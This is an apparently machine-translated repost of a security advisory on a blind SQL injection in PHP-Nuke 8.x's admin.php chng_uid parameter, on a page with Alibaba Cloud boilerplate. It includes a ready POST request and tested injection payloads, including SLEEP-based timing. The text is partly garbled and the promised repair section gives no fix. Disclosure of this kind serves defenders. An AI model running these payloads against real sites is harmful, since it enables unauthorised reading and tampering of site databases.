PHP-Nuke 8.x & amp; lt; = chng_uid blind injection defect and repair

Source: Internet
Author: User

Affected Versions:
PHP-Nuke 8.x <=

Vulnerability description:
PHP-Nuke is a Web Portal System or content management system. The goal
Of PHP-Nuke is to have an automated web site to distribute news and
Articles with users system. Each user can submit comments to discuss
The articles. Main features include: web based admin, surveys, top
Page, access stats page with counter, user customizable box, themes
Manager for registered users, friendly administration GUI with graphic
Topic manager, option to edit or delete stories, option to delete
Comments, moderation system, Referrers page to know who link us,
Sections manager, customizable HTML blocks, user and authors edit,
Integrated Banners Ads system, search engine, backend/headlines
Generation (RSS/RDF format), and usage, please more friendly functions.

The "chng_uid" parameter is not properly sanitized upon submission
The/admin. php which leads to Blind SQL Injection vulnerability.
This allows an attacker to inject or manipulate SQL queries in
Back-end database, allowing for the manipulation or disclosure
Arbitrary data.

<* Reference
Original Advisory URL:
Http://yehg.net/lab/pr0js/advisories/?phpnuke-8.x=_ SQL _injection
About PHP-Nuke: http://en.wikipedia.org/wiki/PHP-Nuke
PHP-Nuke 8.0: http://phpnuke.org/modules.php? Name = Downloads & d_op = getit & lid = 658
CWE-89: html> http://cwe.mitre.org/data/definitions/89.html
*>
Test method:


=>/Admin. php

POST/admin. php HTTP/1.1
Referer: http: // localhost/admin. php? Op = mod_users
Content-Type: application/x-www-form-urlencoded
Host: localhost

Chng_uid = [BLIND_ SQL _INJECTION] + & op = modifyUser


Tested Payloads:
Or 1 = 1 -- [TRUE]
Or 1 = 2 -- [FALSE]
Or substring (@ version, 1, 1) = 5 -- [TRUE if mySQL version is 5.x]
Or substring (@ version, 1, 1) = 4 -- [FALSE if mySQL version is 5.x]
Or SLEEP (15) = 0 -- [sleep for 15 seconds]

Successful response (True) returns the user update form page.

 

Vendor solutions
8.0 and lower

Tested version: 8.0
The paid versions, 8.1 and 9.0, of php-Nuke may be vulnerable as well.

Php-Nuke Developers
Http://phpnuke.org

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.